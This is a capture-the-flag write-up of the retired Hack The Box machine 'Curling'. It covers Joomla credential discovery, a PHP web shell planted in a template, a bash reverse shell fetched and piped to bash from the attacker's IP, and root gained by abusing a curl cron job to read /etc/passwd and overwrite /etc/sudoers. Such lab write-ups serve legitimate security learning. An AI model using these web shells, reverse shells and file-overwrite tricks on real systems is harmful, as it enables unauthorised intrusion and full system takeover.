Skip to content

Latest commit

 

History

History
185 lines (141 loc) · 7.32 KB

write-up-curling.md

File metadata and controls

185 lines (141 loc) · 7.32 KB
Raw

Curling

This is the write-up for the box Curling that got retired at the 30th March 2019. My IP address was 10.10.14.24 while I did this.

Let's put this in our hosts file:

10.10.10.150    curling.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -o nmap/curling.nmap 10.10.10.150
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking HTTP (Port 80)

On the web page is a blog with the title "Cewl Curling Site" that runs on Joomla and there is a login form on the right side.

The article with the title "My first post of curling in 2018" is signed by Floris and the header says "Written by Super User" so those could be potential usernames. The blog title could be a hint to use the custom wordlist generator tool CeWL to search for potential credentials.

Such a custom wordlist can be generated with CeWL:

cewl -w curling_cewl.txt 10.10.10.150

When looking at the HTML source code of the homepage, there is a comment in the last line that says secret.txt. This file is accessible by browsing to it:

http://10.10.10.150/secret.txt

The content is one string:

Q3VybGluZzIwMTgh

This string looks like a password, when it gets Base64-decoded:

echo 'Q3VybGluZzIwMTgh' | base64 -d

Curling2018!

After trying out the username floris and this password, the login on the page is successful. These credentials also work on the Joomla backend at /administrator.

Getting command execution

To get command execution on Joomla and start a reverse shell, we try to modify the templates or create a new file to inject PHP code.

Extensions --> Templates --> Templates --> Protostar Details and Files --> New File

Content of own PHP file (shell.php):

<?php system($_REQUEST['cmd']); ?>

This file can be found in /templates/protostar/shell.php and it is possible to execute commands:

http://10.10.10.150/templates/protostar/shell.php?cmd=whoami

The output of the whoami command is www-data. Lets start a reverse shell on the box, by creating a bash script that will get downloaded and executed by the box:

Creating shell.sh

bash -i >& /dev/tcp/10.10.14.24/9001 0>&1

Downloading and executing file:

http://10.10.10.150/templates/protostar/shell.php?cmd=curl%2010.10.14.24/shell.sh%20|%20bash

After sending this request, the listener on my IP and port 9001 starts a reverse shell session as www-data.

Privilege Escalation

In the home directory /home/floris is a file called password_backup. This file is in hexdump format, that can be reversed with xxd:

xxd -r password_backup > password_backup.1

It is non-human readable text and file password_backup.1 shows that it is bzip compresssed data:

bzcat password_backup.1 > password_backup.2

It is still not readable and file password_backup.2 shows that it is gzip compressed data:

zcat password_backup.2 > password_backup.3

It is still not readable and file password_backup.3 shows that it is bzip compressed data:

zcat password_backup.3 > password_backup.4

It is now almost readable and file password_backup.4 shows that it is a POSIX tar archive:

tar -xvf password_backup.4

It extracts the file password.txt with the following content:

5d<wdCbdZu)|hChXll

TIP: All of this can also be automated with CyberChef and here is the recipe for this case.

As the content doesn't look like any type of encoding, just use it as it is on SSH:

ssh floris@10.10.10.150

Privilege Escalation to root

In the home directory /home/floris is a directory /admin-area with two files.

  • report
  • input

The contents of the file report is the HTML source of the initial web page and the content of input is one line:

url = "http://127.0.0.1"

Lets change this to our client and check if it tries to connect to us:

url = "http://10.10.14.24/test"

After a while it connects to our client and rewrites report to the failed request and changes input back to the original state. This probably uses a curl command and with that information it is possible to also read local files:

url = "file:///etc/passwd"

This writes the contents of /etc/passwd into the report file. As this is most likely a Cronjob, it is possible to read the Crontab of root:

url = "file:///var/spool/cron/crontabs/root"

After the next cycle, it shows the results:

* * * * * curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

TIP: The report file can be continuously checked with watch -n 1 cat report as it gets rewritten after every minute.

In curl the -K parameter uses a configuration file, so we can change the configuration that it downloads a file from our local client and rewrites a sensitive file on the box like the sudoers file.

Modifying input:

url = "http://10.10.14.24/sudoers"
output = "/etc/sudoers"
user-agent = "whateveragent/1.0

This will download my sudoers file with the all permission for floris and rewrite /etc/sudoers on the box:

root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

Now it is possible to change user to root with sudo su - and the password of floris!